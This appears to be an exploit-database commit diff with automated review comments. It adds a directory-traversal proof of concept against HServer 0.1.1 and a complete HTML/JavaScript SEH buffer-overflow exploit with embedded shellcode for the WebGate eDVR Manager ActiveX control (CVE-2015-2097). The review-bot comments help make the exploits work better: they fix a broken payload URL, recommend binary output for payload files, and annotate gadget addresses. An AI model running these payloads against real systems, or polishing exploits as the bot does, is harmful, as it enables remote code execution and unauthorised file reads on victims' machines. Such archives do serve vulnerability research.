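Review bot: The payload construction here is identical to the Mini-stream Ripper script added in the same commit, down to the 35032-byte `junk` length, the `0x7C9D30D7` return address and the output-file name pattern, with only `crack.ram` and the vendor link changed; if the RM Downloader offset was measured independently the header should say so, otherwise a reader will assume it was copied across and may not trust it. The `eip=` line should name the module the address lives in and the OS/service pack it was taken from, since the header claims Windows 7 Pro as tested and a fixed address is not expected to survive ASLR there. As in the sibling script, `open (file, "w")` should be `open(file, "wb")` so the payload bytes are not subject to newline translation when the generator runs on Windows.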
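--- /dev/null
+++ b/platforms/windows/remote/36500.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/51286/info
+
+HServer web server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input submitted to its web interface.
+
+Exploiting this issue will allow an attacker to view arbitrary files within the context of the web server. Information harvested may aid in launching further attacks.
+
+HServer 0.1.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/..%5c..%5c..%5cboot.ini
+http://www.example.com/..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
+http://www.example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
+http://www.example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdr ivers%5cetc%5chosts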
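Review bot: The last PoC URL contains a space inside `dr ivers` (`system32%5cdr ivers%5cetc%5chosts`), which looks like a line-wrap artifact carried over from the source advisory and makes the request invalid as written; it should read `...%5cwindows%5csystem32%5cdrivers%5cetc%5chosts` like the second URL. The first and third URLs differ only in whether the `..` is percent-encoded, which is the useful observation that the server decodes before checking the path; a one-line note saying so would make the intent of the four variants clear.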
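--- /dev/null
+++ b/platforms/windows/remote/36505.txt
@@ -0,0 +1,88 @@
+<html>
+<!--
+# Exploit Title: WebGate eDVR Manager WESPMonitor.WESPMonitorCtrl LoadImage Stack Buffer Overflow Remote Code Execution (0 day)
+# Date: 26th MArch, 2015
+# Exploit Author: Praveen Darshanam
+# Vendor Homepage: http://www.webgateinc.com/wgi/eng/
+# Software Link: http://www.webgateinc.com/wgi_htdocs/eng/dcenter/view.php?id=wgi_eng&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=531&category_group=4&category_product=74&category=174
+# Version: 1, 6, 42, 0
+# Tested on: Windows XP SP3 (IE6/7/8)
+# CVE : 2015-2097
+
+targetFile = "C:\Windows\System32\WESPSDK\WESPMonitor.dll"
+prototype = "Sub LoadImage ( ByVal bstrFullPath As String )"
+memberName = "LoadImage"
+progid = "WESPMONITORLib.WESPMonitorCtrl"
+argCount = 1
+For full analysis of the exploit refer
+http://blog.disects.com/2015/03/webgate-edvr-manager.html
+-->
+
+<object classid='clsid:B19147A0-C2FD-4B1F-BD20-3A3E1ABC4FC3' id='target'>
+</object>
+<script>
+var arg1 = "";
+nops = "";
+var buff = "";
+
+for(i=0;i<268;i++)
+{
+arg1 += "B";
+}
+
+nseh = "\xeb\x10\x90\x90"; //jmp over addr
+seh = "\x71\x47\x01\x10"; //pop pop ret addr
+document.write("</br>"+"Lengths: arg1="+arg1.length+" seh="+seh.length+"</br>");
+
+for(i=0;i<200;i++)
+{
+nops += "\x90";
+}
+
+sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
+"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
+"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
+"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
+"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
+"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
+"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
+"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
+"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
+"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
+"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
+"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
+"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
+"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
+"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
+"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
+"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
+"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
+"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
+"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
+"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
+"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
+"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
+"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
+"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
+"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
+"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
+"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
+"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
+"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
+"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
+"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
+"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
+"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
+"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";
+
+for(i=0;i<(4000-(arg1.length + seh.length + nseh.length + nops.length+ sc.length));i++)
+{
+buff += "A";
+}
+
+// [junk buffer][next SEH(jump)][SE Handler (pop pop ret)][Shellcode]
+fbuff = arg1 + nseh + seh + nops + sc + buff;
+target.LoadImage(fbuff);
+
+</script>
+</html>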
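Review bot: The SEH handler address `0x10014771` (`seh = "\x71\x47\x01\x10"`) is hard-coded with no comment naming the module it was taken from, presumably `WESPMonitor.dll` given `targetFile`, nor whether that module is built without SafeSEH and ASLR; add `// pop pop ret in WESPMonitor.dll 1.6.42.0, no SafeSEH/ASLR - TODO confirm` next to it so the address can be re-derived for other builds. The layout comment `// [junk buffer][next SEH(jump)][SE Handler (pop pop ret)][Shellcode]` omits the 200-byte NOP sled and the trailing `buff` padding that `fbuff` actually places around `sc`; update it to `// [arg1 junk][nSEH jmp][SEH pop/pop/ret][nops][shellcode][padding to 4000]`. The `document.write` of the buffer lengths is debugging output and can be removed from the final PoC.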